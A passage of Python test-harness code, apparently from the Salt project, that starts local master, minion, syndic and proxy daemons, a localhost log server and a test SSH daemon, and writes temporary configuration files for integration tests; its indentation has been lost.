usock.close()
return port
DARWIN = True if sys.platform.startswith('darwin') else False
BSD = True if 'bsd' in sys.platform else False
if DARWIN and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD:
usock.close()
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = True
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
socketserver.TCPServer.server_activate(self)
#super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, 'shutting_down'):
self.shutting_down.set()
socketserver.TCPServer.server_close(self)
#super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = msgpack.Unpacker(encoding='utf-8')
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc:
log.exception(exc)
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.get_colors(self.parser.options.no_colors is False)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ''
def __enter__(self):
'''
Start a master and minion
'''
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(
self.master_opts
)
# Set up PATH to mockbin
self._enter_mockbin()
if self.parser.options.transport == 'zeromq':
self.start_zeromq_daemons()
elif self.parser.options.transport == 'raet':
self.start_raet_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, 'ssh', False):
self.prep_ssh()
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_daemon(self, cls, opts, start_fun):
def start(cls, opts, start_fun):
salt.utils.appendproctitle('{0}-{1}'.format(self.__class__.__name__, cls.__name__))
daemon = cls(opts)
getattr(daemon, start_fun)()
process = multiprocessing.Process(target=start,
args=(cls, opts, start_fun))
process.start()
return process
def start_zeromq_daemons(self):
'''
Fire up the daemons used for zeromq tests
'''
self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.daemon = True
self.log_server_process.start()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name='salt-master',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-master/{}'.format(self.master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=30)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name='salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-minion/{}'.format(self.minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=30)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name='sub salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='sub-salt-minion/{}'.format(self.sub_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=30)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.smaster_process = start_daemon(
daemon_name='salt-smaster',
daemon_id=self.syndic_master_opts['id'],
daemon_log_prefix='salt-smaster/{}'.format(self.syndic_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=30)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name='salt-syndic',
daemon_id=self.syndic_opts['id'],
daemon_log_prefix='salt-syndic/{}'.format(self.syndic_opts['id']),
daemon_cli_script_name='syndic',
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=30)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
if self.parser.options.proxy:
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name='salt-proxy',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-proxy/{}'.format(self.proxy_opts['id']),
daemon_cli_script_name='proxy',
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=30)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
def start_raet_daemons(self):
'''
Fire up the raet daemons!
'''
import salt.daemons.flo
self.master_process = self.start_daemon(salt.daemons.flo.IofloMaster,
self.master_opts,
'start')
self.minion_process = self.start_daemon(salt.daemons.flo.IofloMinion,
self.minion_opts,
'tune_in')
self.sub_minion_process = self.start_daemon(salt.daemons.flo.IofloMinion,
self.sub_minion_opts,
'tune_in')
# Wait for the daemons to all spin up
time.sleep(5)
# self.smaster_process = self.start_daemon(salt.daemons.flo.IofloMaster,
# self.syndic_master_opts,
# 'start')
# no raet syndic daemon yet
start_tcp_daemons = start_zeromq_daemons
def prep_ssh(self):
'''
Generate keys and start an ssh daemon on an alternate port
'''
sys.stdout.write(
' * {LIGHT_GREEN}Starting {0} ... {ENDC}'.format(
'SSH server',
**self.colors
)
)
keygen = salt.utils.path.which('ssh-keygen')
sshd = salt.utils.path.which('sshd')
if not (keygen and sshd):
print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!')
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test')
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'key_test',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_err)))
sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config')
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'server')
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key')
server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub')
server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key')
server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub')
server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key')
server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host.ed25519_key.pub')
for server_key_file in (server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[keygen, '-t',
'dsa',
'-b',
'1024',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_dsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_dsa_err)))
keygen_process_ecdsa = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ecdsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_escda_err)))
keygen_process_ed25519 = subprocess.Popen(
[keygen, '-t',
'ed25519',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ed25519_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_ed25519_err)))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config:
ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd.pid')
self.sshd_process = subprocess.Popen(
[sshd, '-f', 'sshd_config', '-oPidFile={0}'.format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print('sshd had errors on startup: {0}'.format(salt.utils.stringutils.to_str(sshd_err)))
else:
os.environ['SSH_DAEMON_RUNNING'] = 'True'
roster_path = os.path.join(FILES, 'conf/_ssh/roster')
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
sys.stdout.write(
' {LIGHT_GREEN}STARTED!\n{ENDC}'.format(
**self.colors
)
)
@classmethod
def config(cls, role):
'''
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
'''
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
mopts=self.master_opts
)
return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']
@classmethod
def transplant_configs(cls, transport='zeromq'):
if os.path.isdir(RUNTIME_VARS.TMP_CONF_DIR):
shutil.rmtree(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
with salt.utils.files.fopen(tests_known_hosts_file, 'w') as known_hosts:
known_hosts.write('')
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
master_opts['root_dir'] = os.path.join(TMP, 'rootdir')
master_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki', 'master')
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(master_opts)
# Let's update with the syndic configuration
syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
syndic_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
syndic_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# This minion connects to master
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
minion_opts['root_dir'] = os.path.join(TMP, 'rootdir')
minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki')
minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts['cachedir'] = os.path.join(TMP, 'rootdir-sub-minion', 'cache')
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['config_dir'] = RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
sub_minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir-sub-minion', 'pki', 'minion')
sub_minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
syndic_master_opts['cachedir'] = os.path.join(TMP, 'rootdir-syndic-master', 'cache')
syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR
syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
syndic_master_opts['pki_dir'] = os.path.join(TMP, 'rootdir-syndic-master', 'pki', 'master')
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'proxy'))
proxy_opts['cachedir'] = os.path.join(TMP, 'rootdir-proxy', 'cache')
# proxy_opts['user'] = running_tests_user
proxy_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
proxy_opts['root_dir'] = os.path.join(TMP, 'rootdir-proxy')
proxy_opts['pki_dir'] = os.path.join(TMP, 'rootdir-proxy', 'pki')
proxy_opts['hosts.file'] = os.path.join(TMP, 'rootdir-proxy', 'hosts')
proxy_opts['aliases.file'] = os.path.join(TMP, 'rootdir-proxy', 'aliases')
if transport == 'raet':
master_opts['transport'] = 'raet'
master_opts['raet_port'] = 64506
minion_opts['transport'] = 'raet'
minion_opts['raet_port'] = 64510
sub_minion_opts['transport'] = 'raet'
sub_minion_opts['raet_port'] = 64520
# syndic_master_opts['transport'] = 'raet'
if transport == 'tcp':
master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
syndic_master_opts['transport'] = 'tcp'
proxy_opts['transport'] = 'tcp'
# Set up config options that require internal data
master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
'base': [os.path.join(FILES, 'pillar', 'base')]
}
master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
master_opts.setdefault('reactor', []).append(
{
'salt/minion/*/start': [
os.path.join(FILES, 'reactor-sync-minion.sls')
],
}
)
for opts_dict in (master_opts, syndic_master_opts):
if 'ext_pillar' not in opts_dict:
opts_dict['ext_pillar'] = []
if salt.utils.platform.is_windows():
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
else:
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
),
new_extension_modules_path
)
opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
proxy_opts['runtests_conn_check_port'] = get_unused_localhost_port()
for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts, proxy_opts):
if 'engines' not in conf:
conf['engines'] = []
conf['engines'].append({'salt_runtests': {}})
if 'engines_dirs' not in conf:
conf['engines_dirs'] = []
conf['engines_dirs'].insert(0, ENGINES_DIR)
if 'log_handlers_dirs' not in conf:
conf['log_handlers_dirs'] = []
conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
conf['runtests_log_port'] = SALT_LOG_PORT
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), 'w') as fp_:
fp_.write(yaml.dump(computed_config, default_flow_style=False))
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'), 'w') as wfh:
wfh.write(
yaml.dump(sub_minion_computed_config, default_flow_style=False)
)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'master'))
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w') as wfh:
wfh.write(
yaml.dump(syndic_master_computed_config, default_flow_style=False)
)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w') as wfh:
wfh.write(
yaml.dump(syndic_computed_config, default_flow_style=False)
)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'))
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'))
minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
)
sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'))
syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
proxy_opts = salt.config.proxy_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'proxy'))
RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['proxy'] = freeze(proxy_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['cachedir'], 'raet'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(syndic_master_opts['pki_dir'], 'minions'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(syndic_master_opts['cachedir'], 'jobs'),
os.path.join(syndic_master_opts['cachedir'], 'raet'),
os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
os.path.join(syndic_master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['cachedir'], 'raet'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['cachedir'], 'raet'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['cachedir'], 'raet'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
syndic_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
